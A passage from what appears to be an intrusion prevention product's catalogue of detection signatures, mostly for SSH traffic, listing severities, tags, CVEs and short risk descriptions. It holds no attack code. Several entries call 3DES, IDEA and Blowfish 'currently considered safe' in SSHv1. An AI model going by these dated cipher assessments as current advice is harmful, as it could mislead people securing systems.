Last changed: sgpkg-ips-870-5242
Description: SquirrelMail is a commonly used web interface to local mail services.
Back to top

SRIT

About this situation: Application SRIT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Srit provides software solutions to Telecommunications, Government, Healthcare, and Professional Service organizations. Solutions include End-to-End Enterprise Implementation, Application Management and Beyond-ERP initiatives.
Back to top

SRL_Auto-Mode

About this situation: Notice
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-218-3038
Description: Syn Rate Limit activated in automatic mode. Engine calculated values:
Back to top

SRP_CS-RIM-BlackBerry-Enterprise-Server-Router-Denial-Of-Service

About this situation: Detects denial of service attacks against BlackBerry Enterprise Server routers
Context: SRP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, CVE2005, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-409-4219
Vulnerability: SRP_RIM-BlackBerry-Enterprise-Server-Router-Denial-Of-Service
Description:
Back to top

SSDP

About this situation: SSDP traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-636-5211
Description: SSDP a network protocol for advertisement and discovery of network services and presence information.
Back to top

SSH

About this situation: SSH traffic
Context: Application Context
Severity: 1
Tags: Protocols, Remote control, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1190-5242
Description: SSH is a cryptographic network protocol for secure data communication, remote command-line login, remote command execution, and other secure network services between two networked computers.
Back to top

SSH-Client-Bad-Compat-Version

About this situation: Invalid version number from SSH client
Context: SSH without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-248-3038
Description: The SSH client is using protocol version number 1.99, which means a backwards compatible SSH version 2 server. According to the SSH protocol specifications, the client is not supposed to use the compatibility version number. Risk analysis: Risk level is low.
Back to top

SSH-Client-Not-encrypted-data

About this situation: Entropy of data sent by SSH client is low
Context: SSH without parameters
Severity: 8
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: According to statistical checking, the data sent by the SSH client does not seem random, which is a property of encrypted data streams. Risk analysis: Risk level is high. Unless the SSH server is using the "none" cipher, which is typically forbidden, unencrypted data is only seen in SSH connections when certain attacks are attempted.
Back to top

SSH-Compat-flow-control-violation

About this situation: Bad packet ordering in an SSH connection
Context: SSH without parameters
Severity: 8
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: The SSH server did not wait for the client version string when using SSH version 1.99, which means backwards compatibility to SSH protocol version 1 implementation. Risk analysis: Risk level is intermediate.
Back to top

SSH-Key-Exchange-Invalid-Parameters

About this situation: The parameter format is bad.
Context: SSH without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-161-2032
Description: An algorithm or parameter list in the SSH key exchange (KEX) is bad or excessively long. This situation is not against the SSH protocol specifications, but deviates from normal behaviour. Risk analysis: Risk level is low.
Back to top

SSH-protocol-version-1

About this situation: An SSH connection uses SSH protocol version 1
Context: SSH without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-161-2032
Description: An SSH connection that has been established successfully uses SSH protocol version 1. Risk analysis: Risk level is low.
Back to top

SSH-protocol-version-2

About this situation: An SSH connection uses SSH protocol version 2
Context: SSH without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-160-2032
Description: An SSH connection that has been established successfully uses SSH version 2. Risk analysis: Risk level is low.
Back to top

SSH-Protocol-versions-incompatible

About this situation: SSH connection was unsuccessful because of incompatible protocol versions
Context: SSH without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-450-4333
Description: The SSH connection was not successful because the protocol versions in the server and client were different. Risk analysis: Risk level is low.
Back to top

SSH-Server-Not-encrypted-data

About this situation: Entropy of data sent by SSH server is low
Context: SSH without parameters
Severity: 8
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: According to statistical checking, the data sent by the SSH server does not seem random, which is a property of encrypted data streams. Risk analysis: Risk level is high. Unless the SSH server is using the "none" cipher, which is typically forbidden, unencrypted data is only seen in SSH connections when certain attacks are attempted by the client.
Back to top

SSH-unknown-protocol-version

About this situation: An SSH connection uses an unknown SSH protocol version
Context: SSH without parameters
Severity: 1
Tags: Protocol Violations, SSM SSH Proxy, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-450-4333
Description: An SSH implementation uses a protocol version that is unknown. Risk analysis: Risk level is intermediate.
Back to top

SSHv1_Client-Cipher-3DES

About this situation: SSHv1 client selected 3DES cipher
Context: SSH without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An SSHv1 client selected the 3DES cipher algorithm. The 3DES cipher algorithm is currently considered safe, and therefore this situation is informative only. Risk analysis: Risk level is none.
Back to top

SSHv1_Client-Cipher-ARCFOUR

About this situation: SSHv1 client selected broken ARCFOUR cipher
Context: SSH without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An SSHv1 client selected the ARCFOUR cipher algorithm. ARCFOUR cipher as implemented in SSH version 1 is considered broken. Risk analysis: Risk level is medium. Clients using insecure ciphers are vulnerable to eavesdropping and session hijacking. Sometimes, it may be acceptable to use a weaker cipher for a faster data transfer. However, if the client advertises an insecure cipher, harm may occur only after the client decides to use the cipher.
Back to top

SSHv1_Client-Cipher-Blowfish

About this situation: SSHv1 client selected Blowfish cipher
Context: SSH without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An SSHv1 client selected the Blowfish cipher algorithm. The Blowfish cipher algorithm is currently considered safe, and therefore this situation is informative only. Risk analysis: Risk level is none.
Back to top

SSHv1_Client-Cipher-DES

About this situation: SSHv1 client selected DES cipher
Context: SSH without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An SSHv1 client selected the DES cipher algorithm. The DES cipher is no longer considered secure enough for general use due to short key length. Risk analysis: Risk level is low. Clients using insecure ciphers are vulnerable to eavesdropping and session hijacking. Sometimes, it may be acceptable to use a weaker cipher for a faster data transfer. However, if the server advertises an insecure cipher, harm may occur only after the client decides to use the cipher.
Back to top

SSHv1_Client-Cipher-IDEA

About this situation: SSHv1 client selected IDEA cipher
Context: SSH without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An SSHv1 client selected the IDEA cipher algorithm. The IDEA cipher algorithm is currently considered safe, and therefore this situation is informative only. Risk analysis: Risk level is none.
Back to top

SSHv1_Client-Cipher-None

About this situation: SSHv1 using "none" cipher
Context: SSH without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An SSHv1 client selected "none" for the cipher algorithm. The SSH cipher "none" does not provide security and is provided only for testing purposes. Risk analysis: Risk level is medium. Clients using "none" for the cipher are vulnerable to eavesdropping and session hijacking. Sometimes, it may be acceptable to use the "none" cipher for a faster data transfer. Note: when using the "none" cipher, SSHv1 crypto bit ratio violations typically get triggered.
Back to top

SSHv1_Client-Cipher-TSS

About this situation: SSHv1 client selected broken TSS cipher
Context: SSH without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An SSHv1 client selected the TSS cipher algorithm. The TSS cipher as implemented in SSH version 1 is considered broken. Risk analysis: Risk level is medium. Clients using insecure ciphers are vulnerable to eavesdropping and session hijacking. Sometimes, it may be acceptable to use a weaker cipher for a faster data transfer. However, if the client advertises an insecure cipher, harm may occur only after the client decides to use the cipher.
Back to top

SSHv1_Server-Authentication-'rhosts'-Advertised

About this situation: SSHv1 server advertised support for 'rhosts' authentication
Context: SSH without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The SSHv1 server advertised support for 'rhosts' authentication.
Back to top

SSHv1_Server-Authentication-'rhosts'-And-RSA-Advertised

About this situation: SSHv1 server advertised support for combination of 'rhosts' and RSA authentication
Context: SSH without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The SSHv1 server advertised support for a combination of 'rhosts' and RSA authentication. Risk analysis: Risk level is none.
Back to top

SSHv1_Server-Authentication-Kerberos-Advertised

About this situation: SSHv1 server advertised support for Kerberos authentication.
Context: SSH without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The SSHv1 server advertised support for Kerberos authentication. Risk analysis: Risk level is medium. Some SSH versions, such as SSH 1.2.27, contain exploitable vulnerabilities that only work if Kerberos authentication is enabled.
Back to top

SSHv1_Server-Authentication-Kerberos_TGT-Advertised

About this situation: SSHv1 server advertised support for Kerberos_TGT authentication
Context: SSH without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The SSHv1 server advertised support for Kerberos_TGT authentication. Risk analysis: Risk level is medium. Some SSH versions, such as SSH 1.2.27, contain exploitable vulnerabilities that only work if Kerberos authentication is enabled.
Back to top

SSHv1_Server-Authentication-Password-Advertised

About this situation: SSHv1 server advertised support of password authentication
Context: SSH without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The SSHv1 server advertised support of password authentication. Risk analysis: Risk level is none.
Back to top

SSHv1_Server-Authentication-RSA-Advertised

About this situation: SSHv1 server advertised support for RSA authentication
Context: SSH without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The SSHv1 server advertised support for RSA authentication. Risk analysis: Risk level is none.
Back to top

SSHv1_Server-Authentication-TIS-Advertised

About this situation: SSHv1 server advertised support for TIS authentication
Context: SSH without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The SSHv1 server advertised support for TIS authentication.
Back to top

SSHv1_Server-Cipher-3DES-Advertised

About this situation: SSHv1 server advertised support for 3DES cipher algorithm
Context: SSH without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The SSH version 1 server advertised support for the 3DES cipher algorithm. The 3DES cipher algorithm is currently considered safe, and therefore this situation is informative only. Risk analysis: Risk level is none.
Back to top

SSHv1_Server-Cipher-ARCFOUR-Advertised

About this situation: SSHv1 Server accepts broken ARCFOUR cipher
Context: SSH without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The SSH version 1 server advertised support for the ARCFOUR cipher algorithm. The ARCFOUR cipher as implemented in SSH version 1 is considered broken. Risk analysis: Risk level is low. Clients using insecure ciphers are vulnerable to eavesdropping and session hijacking. Sometimes, it may be acceptable to use a weaker cipher for a faster data transfer. However, if the server advertises an insecure cipher, harm may occur only after the client decides to use the cipher.
Back to top

SSHv1_Server-Cipher-Blowfish-Advertised

About this situation: SSHv1 server accepts Blowfish cipher
Context: SSH without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The SSH version 1 server advertised support for the Blowfish cipher algorithm. The Blowfish cipher algorithm is currently considered safe, and therefore this situation is informative only. Risk analysis: Risk level is none.
Back to top

SSHv1_Server-Cipher-DES-Advertised

About this situation: SSHv1 Server accepts DES cipher
Context: SSH without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The SSH version 1 server advertised support for the DES cipher algorithm. The DES cipher is no longer considered secure enough for general use due to short key length. Risk analysis: Risk level is low. Clients using insecure ciphers are vulnerable to eavesdropping and session hijacking. Sometimes, it may be acceptable to use a weaker cipher for a faster data transfer. However, if the server advertises an insecure cipher, harm may occur only after the client decides to use the cipher.
Back to top

SSHv1_Server-Cipher-IDEA-Advertised

About this situation: SSHv1 Server accepts IDEA cipher
Context: SSH without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The SSH version 1 server advertised support for the IDEA cipher algorithm. The IDEA cipher algorithm is currently considered safe, and therefore this situation is informative only. Risk analysis: Risk level is none.
Back to top

SSHv1_Server-Cipher-None-Advertised

About this situation: SSHv1 server accepts "none" cipher
Context: SSH without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The SSH version 1 server advertised support for the "none" cipher algorithm. The SSH cipher "none" does not provide security and is provided only for testing purposes. Risk analysis: Risk level is medium. Clients using "none" for the cipher are vulnerable to eavesdropping and session hijacking. Sometimes, it may be acceptable to use the "none" cipher for a faster data transfer. However, if the server advertises an insecure cipher, harm may occur only after the client decides to use the cipher. Note: when using the "none" cipher, SSHv1 crypto bit ratio violations typically get triggered.
Back to top

SSHv1_Server-Cipher-TSS-Advertised

About this situation: SSHv1 Server accepts broken TSS cipher
Context: SSH without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The SSH version 1 server advertised support for the TSS cipher algorithm. The TSS cipher as implemented in SSH version 1 is considered broken. Risk analysis: Risk level is low. Clients using insecure ciphers are vulnerable to eavesdropping and session hijacking. Sometimes, it may be acceptable to use a weaker cipher for a faster data transfer. However, if the server advertises an insecure cipher, harm may occur only after the client decides to use the cipher.
Back to top

SSH_Bad-Version-Comment-Gobbles

About this situation: Possible Gobbles ssh exploit detected
Context: SSH Client Version Comment
Severity: 10
Tags: Any Operating System, Any Hardware, OpenSSH, CVE2002, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: OpenSSH-Challenge-Response-Integer-Overflow
Description:
Back to top

SSH_Channel_Request_Denied

About this situation: Forbidden SSH Channel Request
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: SSH channel request not allowed by Protocol Parameters
Back to top

SSH_Channel_Type_Denied

About this situation: Forbidden SSH Channel Type
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: SSH channel type not allowed by Protocol Parameters
Back to top

SSH_CS-Google-Golang-Crypto-Public-Key-Verify-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Google Golang detected
Context: SSH TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Google Golang, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Google-Golang-Crypto-Public-Key-Verify-Denial-Of-Service
Description:
Back to top

SSH_CS-OpenSSH-Sftp-Server.c-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSH detected
Context: SSH TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSH, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1077-5242
Last changed: sgpkg-ips-1077-5242
Vulnerability: OpenSSH-Sftp-Server.c-Denial-Of-Service
Description:
Back to top

SSH_CS-OpenSSH-Sshd-Username-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in OpenSSH detected
Context: SSH TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSH, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1213-5242
Vulnerability: OpenSSH-Sshd-Username-Information-Disclosure
Description:
Back to top

SSH_CS-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: SSH TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

SSH_CS-Solarwinds-Serv-U-FTP-Server-SSH-AES-NEWKEYS-Uninitialized-Memory-Use

About this situation: An attempt to exploit a vulnerability in SolarWinds Serv-U FTP Server detected.
Context: SSH TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Serv-U FTP Server, CVE2021, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1441-5242
Last changed: sgpkg-ips-1467-5242
Vulnerability: Solarwinds-Serv-U-FTP-Server-SSH-AES-NEWKEYS-Uninitialized-Memory-Use
Description:
Back to top

SSH_Decryption-Failed

About this situation: SSM SSH Proxy packet decryption failed.
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Corrupt data or an internal error caused a failure in decryption of an encrypted packet.
Back to top

SSH_Disconnected

About this situation: SSM SSH Proxy received a disconnect message from an SSH peer.
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The SSH Proxy received a disconnect message from an SSH peer.
Back to top

SSH_Ebury-SSH-Backdoor-Activity

About this situation: Ebury SSH Rootkit backdoor detected
Context: SSH TCP Server Stream
Severity: 10
Tags: Unix, Linux, Any Hardware, Ebury SSH Rootkit, Unix not specific, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-1728-5242
Description:
Back to top

SSH_Ebury-SSH-Client-Backdoor-Activity

About this situation: Ebury SSH Rootkit backdoor detected
Context: SSH TCP Client Stream
Severity: 7
Tags: Linux, Any Hardware, Ebury SSH Rootkit, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Ebury-SSH-Backdoor-Activity
Description:
Back to top

SSH_Encryption-Failed

About this situation: SSM SSH Proxy packet encryption failed.
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: An internal error caused failure in encryption of a packet.
Back to top

SSH_Erlang-OTP-SSH-Library-Unauthenticated-Remote-Code-Execution-CVE-2025-32433

About this situation: An attempt to exploit a vulnerability in the Erlang/OTP SSH library detected
Context: SSH TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Erlang OTP, CVE2025, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, 5th Most Recent Update
First detected in: sgpkg-ips-1869-5242
Last changed: sgpkg-ips-1869-5242
Vulnerability: Erlang-OTP-SSH-Library-Unauthenticated-Remote-Code-Execution-CVE-2025-32433
Description:
Back to top

SSH_FortiGate-OS-Backdoor-Access-Attempt

About this situation: An attempt to access a backdoor in FortiGate OS detected
Context: SSH TCP Client Stream
Severity: 7
Tags: FortiGate OS, Any Hardware, CVE2016, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: FortiGate-OS-Backdoor
Description:
Back to top

SSH_Freeftpd-Key-Exchange-Algorithm-String-Buffer-Overflow

About this situation: An attempt to exploit a Freeftpd Key Exchange Algorithm String Buffer Overflow vulnerability detected.
Context: SSH TCP Client Stream
Severity: 7
Tags: Windows, Any Hardware, FreeFTPd, CVE2006, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-739-5211
Vulnerability: Freeftpd-Key-Exchange-Algorithm-String-Buffer-Overflow
Description:
Back to top

SSH_Global_Request_Denied

About this situation: Forbidden SSH Global Request
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: SSH global request not allowed by Protocol Parameters
Back to top

SSH_Golang-Reference-Client-2.0

About this situation: SSH-2.0-Go usage detected
Context: SSH TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Golang SSH, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-714-5211
Description:
Back to top

SSH_GoodTech-SSH-Server-Sftp-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GoodTech Systems SSH Server detected
Context: SSH TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GoodTech SSH Server, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-437-4219
Vulnerability: GoodTech-SSH-Server-Sftp-Processing-Buffer-Overflow
Description:
Back to top

SSH_ID

About this situation: Invalid ID String
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received invalid ID string. Session terminated.
Back to top

SSH_Integer-Overflow-Attack-Detect

About this situation: OpenSSH Integer Overflow Attack detected
Context: SSH TCP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, OpenSSH, CVE2002, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: OpenSSH-Challenge-Response-Integer-Overflow
Description:
Back to top

SSH_Integer-Overflow-Attack-Detect-Gobbles

About this situation: OpenSSH Integer Overflow Attack detected
Context: SSH TCP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, OpenSSH, CVE2002, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: OpenSSH-Challenge-Response-Integer-Overflow
Description:
Back to top

SSH_Integer-Overflow-Attack-Detect-Gobbles-Reply

About this situation: OpenSSH Integer Overflow Attack detected
Context: SSH TCP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, OpenSSH, CVE2002, Any Operating System not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: OpenSSH-Challenge-Response-Integer-Overflow
Description:
Back to top

SSH_Invalid_Event

About this situation: Invalid Event
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received unexpected SSH record data from peer. Session terminated.
Back to top

SSH_Invalid_MAC

About this situation: Invalid MAC
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received packet with invalid MAC. Session terminated.
Back to top

SSH_MAC_Failure

About this situation: Cannot Compute MAC
Context: SSM Context
Severity: 2
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: MAC cannot be computed, possibly due to an unsupported algorithm.
Back to top

SSH_Novell-Casa-PAM-Module-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell CASA detected
Context: SSH TCP Client Stream
Severity: 7
Tags: Linux, Any Hardware, Novell CASA, CVE2006, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Novell-Casa-PAM-Module-Stack-Buffer-Overflow
Description:
Back to top

SSH_Novell-NetWare-OpenSSH-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell Netware detected
Context: SSH TCP Server Stream
Severity: 7
Tags: Novell NetWare, Any Hardware, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-672-5211
Vulnerability: Novell-NetWare-OpenSSH-Buffer-Overflow
Description:
Back to top

SSH_No_Packet_Type

About this situation: No Packet Type
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Could not get packet type. Session terminated.
Back to top

SSH_OpenSSH-Client-Pre-Authentication-Denial-Of-Service-CVE-2025-26466

About this situation: An attempt to exploit a vulnerability in OpenSSH detected
Context: SSH TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSH, CVE2025, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1839-5242
Last changed: sgpkg-ips-1839-5242
Vulnerability: OpenSSH-Pre-Authentication-Denial-Of-Service-CVE-2025-26466
Description:
Back to top

SSH_OpenSSH-Kex_Input_Kexinit-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSH detected
Context: SSH TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSH, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1868-5242
Vulnerability: OpenSSH-Kex_Input_Kexinit-Denial-Of-Service
Description:
Back to top

SSH_OpenSSH-Server-Pre-Authentication-DoS-CVE-2025-26466

About this situation: An attempt to exploit a vulnerability in OpenSSH detected
Context: SSH TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSH, CVE2025, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1839-5242
Last changed: sgpkg-ips-1839-5242
Vulnerability: OpenSSH-Pre-Authentication-Denial-Of-Service-CVE-2025-26466
Description:
Back to top

SSH_OpenSSH-Sshd-SSH_old_dhgex-Handling-Double-Free-Vulnerability

About this situation: An attempt to exploit a vulnerability in OpenSSH OpenSSH detected
Context: SSH TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSH, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Vulnerability: OpenSSH-Sshd-SSH_old_dhgex-Handling-Double-Free-Vulnerability
Description:
Back to top

SSH_Packet_Size

About this situation: Invalid Packet Size
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a packet whose size is not a multiple of the cipher block size. Session terminated.
Back to top

SSH_Packet_Type

About this situation: Invalid Packet Type
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Invalid packet type. Session terminated.
Back to top

SSH_Parameter-Mismatch

About this situation: SSM SSH Proxy has no matching cryptographic algorithms with its peer.
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The SSH Proxy has no matching cryptographic algorithms with its peer. The log message details specify which type of algorithm is in conflict.
Back to top

SSH_Protocol_Error

About this situation: SSH Protocol Error
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Request denied. Invalid SSH message format.
Back to top

SSH_Rekey_Bug

About this situation: Endpoint Cannot Rekey
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The Protocol Parameters do not allow connections to endpoints that cannot rekey. Session terminated.
Back to top

SSH_Server_Key

About this situation: SSH Server Key
Context: SSM Context
Severity: 1
